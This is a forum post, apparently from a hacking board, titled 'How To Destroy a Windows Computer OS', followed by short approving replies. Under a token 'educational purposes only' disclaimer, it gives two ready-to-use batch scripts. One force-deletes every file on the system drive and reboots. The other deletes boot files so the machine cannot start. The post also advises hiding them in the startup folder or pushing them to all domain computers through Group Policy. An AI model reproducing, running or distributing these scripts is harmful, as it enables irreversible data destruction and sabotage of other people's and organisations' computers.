Sign in to follow this  
suffocate

How To Destroy a Windows Computer OS

Recommended Posts

The methods below are for educational purposes only. You must have administrator rights.  

 

[hide]

 

First download a text file editor such as SublimeText, Atom, or Notepad++

 

Or just open a notepad app, such as notepad.

 

Below are lines you would add to the notepad document, and then save as something like "  If_I_Click_Im_Fucked.bat  "

 

The .bat part is important because this makes it a batch file.  If your using notepad you may need to select "all files" from the type of file to save as.

 

Clicking the file executes the commands, so use at your own risk.  If you want to be less obvious.. Store the files in the startup folder on the admin profile. If you want to be a pain in the ass, Push the file out to all computers on the domain via Group Policy. 

 

 

 

 

 

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

 

 

 

 

 

 

Enter those lines and save as batch file.

 

The first hidden box results in:

2ih497c.jpg

 

 

 

 

METHOD 2

 

30kd07d.jpg

 

Computer will always boot and reboot. Never ending boot screen.

 

Put the code below in a batch file and make sure to put in the startup directory. lol

 

:comfy:

 

 

 

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

 

[/hide]

  • Like 1

Share this post


Link to post
Share on other sites

lol this is amazing

Share this post


Link to post
Share on other sites

The methods below are for educational purposes only. You must have administrator rights.  

 

[/size]

 

cara al sol con la camisa nueeevaaa

Share this post


Link to post
Share on other sites

Great upload.

Keep it up.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this